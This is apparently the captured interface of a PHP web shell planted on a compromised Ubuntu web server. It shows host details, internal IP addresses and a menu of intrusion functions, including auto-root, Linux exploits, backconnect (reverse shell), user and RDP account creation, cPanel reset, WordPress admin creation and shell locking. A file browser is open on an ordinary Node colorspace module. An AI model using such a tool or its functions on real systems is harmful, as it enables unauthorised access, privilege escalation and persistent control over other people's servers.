Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
colorspace /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
drwxrwxr-x
LICENSE.md
1.09
KB
-rw-rw-r--
README.md
973
B
-rw-rw-r--
index.js
740
B
-rw-rw-r--
package.json
750
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var color = require('color') , hex = require('text-hex'); /** * Generate a color for a given name. But be reasonably smart about it by * understanding name spaces and coloring each namespace a bit lighter so they * still have the same base color as the root. * * @param {string} namespace The namespace * @param {string} [delimiter] The delimiter * @returns {string} color */ module.exports = function colorspace(namespace, delimiter) { var split = namespace.split(delimiter || ':'); var base = hex(split[0]); if (!split.length) return base; for (var i = 0, l = split.length - 1; i < l; i++) { base = color(base) .mix(color(hex(split[i + 1]))) .saturate(1) .hex(); } return base; };
Close